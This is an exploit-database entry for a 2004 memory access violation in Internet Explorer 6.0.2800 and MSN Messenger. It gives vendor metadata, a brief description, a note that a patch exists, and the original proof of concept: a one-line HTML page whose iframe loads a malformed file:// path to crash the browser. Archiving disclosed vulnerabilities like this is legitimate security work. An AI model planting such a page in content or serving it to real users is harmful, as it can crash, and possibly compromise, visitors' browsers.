header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
Emmanouel Kellinis
N/A
CVSS
CRITICAL
Memory Access Violation
CWE
Product Name: Internet Explorer
Affected Version From: 6.0.2800
Affected Version To: 6.0.2800
Patch Exists: YES
Related CWE:
CPE: a:microsoft:internet_explorer:6.0.2800
Metasploit:
Other Scripts:
Platforms Tested: Windows
2004

Internet Explorer Memory Access Violation

This exploit targets a vulnerability in Internet Explorer and MSN Messenger that allows for remote code execution. By accessing a specific file through an iframe tag, an attacker can trigger a memory access violation, potentially leading to arbitrary code execution.

Mitigation:

Microsoft released a security patch to address this vulnerability. It is recommended to update to the latest version of Internet Explorer.
Source

Exploit-DB raw data:

<!--
#########################################
Application:    Internet Explorer
Vendors:        http://www.microsoft.com
Version:         6.0.2800
Platforms:      Windows
Bug:              IE and MSN Messenger
                     Memory_Access_Violation
Risk:             Critical
Exploitation:   Remote with browser
Date:             07 May 2004
Author:          Emmanouel Kellinis
e-mail:           me@cipher(dot)org(dot)uk
web:              http://www.cipher.org.uk
List :              BugTraq(SecurityFocus)
#########################################
-->

<HTML><BODY><IFRAME src="file://þ:/filename"></BODY></HTML>

// milw0rm.com [2004-12-21]